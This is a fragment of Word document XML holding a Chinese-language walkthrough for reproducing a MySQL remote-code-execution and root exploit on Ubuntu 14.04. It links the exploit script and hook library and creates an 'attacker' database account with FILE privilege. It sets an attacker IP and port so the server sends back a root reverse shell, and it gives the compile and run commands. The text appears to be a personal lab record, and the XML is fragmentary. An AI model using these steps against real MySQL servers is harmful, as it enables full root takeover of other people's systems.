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57" w:lineRule="atLeast"/>
        <w:ind w:left="16" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsiaTheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="454545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454545"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>0ldSQL_MySQL_RCE_exploit.py：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454545"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t> 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454545"/>
          <w:spacing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Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsiaTheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="454545"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://legalhackers.com/exploits/0ldSQL_MySQL_RCE_exploit.py" \t "http://www.tuicool.com/articles/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsiaTheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="454545"/>
          <w:spacing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Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsiaTheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="454545"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>http://legalhackers.com/exploits/0ldSQL_MySQL_RCE_exploit.py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454545"/>
          <w:spacing w:val="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57" w:lineRule="atLeast"/>
        <w:ind w:left="16" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsiaTheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="454545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454545"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>mysql_hookandroot_lib.c： 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454545"/>
          <w:spacing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Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsiaTheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="454545"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://legalhackers.com/exploits/mysql_hookandroot_lib.c" \t "http://www.tuicool.com/articles/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsiaTheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="454545"/>
          <w:spacing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Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsiaTheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="454545"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>http://legalhackers.com/exploits/mysql_hookandroot_lib.c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454545"/>
          <w:spacing w:val="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在ubuntu 14.04中测试的。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1，安装mysql-server ,mysql-client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sudo apt-get install mysql-server mysql-client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2，安装gcc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sudo apt-get  install  build-essential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3，安装exp脚本中用到的mysql connector，下载地址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http://cdn.mysql.com//Downloads/Connector-Python/mysql-connector-python1.2.3-1ubuntu12.04all.deb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4，创建测试用的数据库，以及需要账号及权限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mysql&gt; create database pocdb;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Query OK, 1 row affected (0.00 sec)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mysql&gt; grant file on *.* to ‘attacker’@’%’ identified by ‘hello123’;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Query OK, 0 rows affected (0.00 sec)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mysql&gt; GRANT SELECT,INSERT,CREATE ON `pocdb`.* TO ‘attacker’@’%’;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Query OK, 0 rows affected (0.00 sec)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注意上面这条中数据库名是用反引号括起来的。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5，编译mysqlhookandrootlib.c文件，编译之前，修改内容如下：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#define ATTACKERS_IP “182.92.100.1”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#define SHELL_PORT 1234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#define INJECTED_CONF “/etc/mysql/my.cnf”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其中IP、端口是另外一台需要监听的服务器的，执行exp之后被攻击服务器会主动向上面的IP跟端口反弹一个root权限的shell。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my.cnf是测试环境中配置文件的默认位置。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编译命令：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gcc -Wall -fPIC -shared -o mysql_hookandroot_lib.so mysql_hookandroot_lib.c -ldl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6，修改/etc/mysql/my.cnf的所属用户及组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chown mysql:mysql /etc/mysql/mysql.cnf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7，唯一鸡肋的地方是需要对ubuntu的apparmor相关的配置，不然exp执行的时候会报错误6，会提示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ERROR 29 (HY000): File ‘/etc/mysql/my.cnf’ not found (Errcode: 13)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right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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>8，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.py文件161行 将</w:t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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注意：此处的作用是将mysql的触发器文件写入到测试数据库所在的同一目录下）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="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia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TRG_path="/usr/local/mysql/data/%s/poctable.TRG" % args.TARGET_DB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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>9</w:t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，然后将编译好的.so文件以及.py文件放到同一个目录，执行如下命令：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sudo python mysqlRECexploit.py -dbuser attacker -dbpass ‘hello123’ -dbhost 127.0.0.1 -dbname pocdb -mycnf /etc/mysql/my.cnf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eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="2378075"/>
            <wp:effectExtent l="0" t="0" r="8890" b="3175"/>
            <wp:docPr id="2" name="图片 2" descr="2016-11-03_143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6-11-03_1435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eastAsia" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:eastAsia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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>需要重启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mysql 然后就会弹出shell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264285"/>
            <wp:effectExtent l="0" t="0" r="7620" b="12065"/>
            <wp:docPr id="1" name="图片 1" descr="2016-11-03_143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-11-03_1435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但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mysql重启报错！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245" cy="269875"/>
            <wp:effectExtent l="0" t="0" r="14605" b="15875"/>
            <wp:docPr id="3" name="图片 3" descr="2016-11-03_143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6-11-03_1436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7" o:spt="75" alt="" type="#_x0000_t75" style="height:92.2pt;width:82.4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7" DrawAspect="Content" ObjectID="_1468075725" r:id="rId7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28" o:spt="75" alt="" type="#_x0000_t75" style="height:106.35pt;width:76.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8" DrawAspect="Content" ObjectID="_1468075726" r:id="rId9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77ED5"/>
    <w:rsid w:val="187057D1"/>
    <w:rsid w:val="1B47559E"/>
    <w:rsid w:val="1DA706F2"/>
    <w:rsid w:val="4DB96D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2016-11-03T07:00:41Z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